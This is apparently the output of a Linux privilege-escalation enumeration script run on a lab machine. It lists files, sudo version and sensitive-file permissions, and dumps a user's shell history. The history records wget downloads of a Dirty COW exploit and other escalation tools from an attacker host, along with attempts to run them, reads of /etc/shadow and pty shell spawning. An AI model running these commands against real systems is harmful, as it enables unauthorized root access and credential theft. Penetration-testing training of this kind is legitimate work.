-rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
-rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
-rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
-rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
-rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
-rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.8p12


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


[-] Installed compilers:
ii gcc 4.1.1-15 The GNU C compiler
ii gcc-4.1 4.1.1-21 The GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
-rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
-rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
-rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow


[-] NFS config details:
-rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
-rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
-rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
-rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
-rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
-rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
-rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
-rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
-rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
-rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
-rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
-rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
-rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
-rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
-rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
-rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
-rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
-rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
-rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
-rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
-rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
-rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
-rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf


[-] Current user's history files:
-rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history


[+] Root's history files are accessible!
-rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history


[-] Location and contents (if accessible) of .bash_history file(s):
/home/bob/.bash_history

exit
exit
exit
ls
cd ..
ls
cd ..
ls
cd usr
ls
cd bin
ls
ls
cd ..
ls
cd ..
ls
cd var
ls
cd bak
cd backups/
ls
cd ..
ls
cd /
find . -exec file {} \; | grep -i elf
/bin/sh -i
ls
id
/bin/bash
ls -l
strings
strings vmlinuz
ls
cd sbin
ls
ls -l
cd ..
ls
cd home
cd bob
ls
cd files
ls
cat *
cd ..
cd ..
cd ..
cd tmp
ls
wget http://10.11.1.86:8000/linuxprivchecker.py
wget http://10.11.1.86:8000/linuxprivchecker.py
wget http://10.11.0.86:8000/linuxprivchecker.py
python linuxprivchecker.py
/bin/su
/usr/bin
ls
cd /usr/bin
ls
strings at
strings at
strings at
wget http://10.11.0.86:8000/dcow.c
cd /tmp
wget http://10.11.0.86:8000/dcow.c
chmod +x dcow.c
./dcow.c
id
euid
ps
ps -eo pid,user,uid,args
ps -eo pid,euid | grep YOUR_PID_HERE
ps
ps -eo pid,euid | grep 3623
ps -eo pid,euid | grep 3620
seteuid(0)
ps -eo pid,euid | grep 3620
./dcow.c
./dcow.c
./dcow.c
./dcow.c
$PATH
echo $PATH
echo $SHELL
find / -perm -u=s -type f 2>/dev/null
$PATH=/bin/su
set $PATH = /bin/su
echo $PATH
export PATH="$PATH:/bin/su"
echo $PATH
whoami
id
ps
/bin/bash
ls
id
echo $PATH
ps
ps -eo pid,euid,ruid,suid | grep 375
ps -eo pid,euid,ruid,suid | grep 677
ps -eo pid,euid,ruid,suid | grep 3623
ps -eo pid,euid,ruid,suid | grep 372
sudo su
/bin/su
/bin.su
/bin/h
/bin/sh
ls
id
whoami
ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
ls
ls -l
cd vmware-root/
ls
strings vmware-root/
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
cd /usr/lib/vmware-tools/bin32/
ls
ls -l
strings vmware-user-suid-wrapper
chmod +x vmware-user-suid-wrapper
./vmware-user-suid-wrapper
id
whoami
uid
id
sudo -l
sudo -s
ls
cd files
ls
cd ~
ls
cd ..
cd ..
ls
cd home
ls
cd .ssh
cd bob
cd .ssj
cd .ssh
ls
cat authorized_keys
cd ..
cd ..
ls
cd ..
ls
cat /etc/passwd
cat /etc/shadow
cd root
ls
cat proof.txt
uname -a
setuid id
setuid
setid
access
setfsuid
ps -f -u user1
ps -f -u bob
ps -eo pid,euid,ruid,suid | grep 2174
ps -eo pid,euid,ruid,suid | grep 2175
ps -eo pid,euid,ruid,suid | grep 2203
setuid(0)
setuid() ;
setuid(0)
setuid('0')
setuid(1001)
setuid
setuid() 1001
setuid() -h
man setuid
seteuid(0)
seteuid(1001)
seteuid() ;
seteuid(getuid())
seteuid(getuid(1001))
getenv("SUDO_UID")
seteuid(0) /bin/bash
/bin/bash
$shell
$ENV
python
pyton -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
ls
wget http://10.11.0.86/linenu.sh
wget http://10.11.0.86:8000/linenu.sh
wget http://10.11.0.86:8000/linenum.sh
wget http://10.11.0.86:8000/linuxprivchecker.py
ls
bash linenum.sh
python linuxprivchecker.py
wget http://10.11.0.86:8000/a.out
./a.out
chmod +x a.out
./a.out
id
ps
ps -aux
ps -eo pid,euid,ruid,suid | grep 2272
ps -eo pid,euid,ruid,suid | grep 2175
nano a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
ps -eo pid,euid,ruid,suid | grep 2175
sudo
sudo -h
sudo --help
sudo -l
nano a.py
python a.py
nano a.py
python a.py
ps -eo pid,euid,ruid,suid | grep 2175
ps
ps -eo pid,euid,ruid,suid | grep 2760
ps -eo pid,euid,ruid,suid | grep 2893
ps
/bin/bash
/bin/sh
ls
python a.py
ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
lsps -efl | grep 'sleep 1' | grep -v gre
ps -efl | grep 'sleep 1' | grep -v gre
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v
ps -efl | grep 'sleep 1'
ps -efl | grep 'sleep 1'
python a.p
python a.py
ls /proc
cd 2893
ls
ls /proc/2893
ls /proc/2893/fd
ls /proc/2893/fd/1
ls /proc/2893/fd/1
cat /proc/2893/fd/1
echo n> /proc/2893/fd/1
echo n >/proc/2893/fd/1
cat /proc/2893/fd/1
echo n >/proc/2893/fd/1
loc
ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
ps -efl | grep 'sleep 1' | grep -v grep
ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
python a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
nano a.py
python a.py
nano a.py
whoami
id
ps aux
/bin/sh
ls
whoami
id
/bin/bash


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..


### SCAN COMPLETE ####################################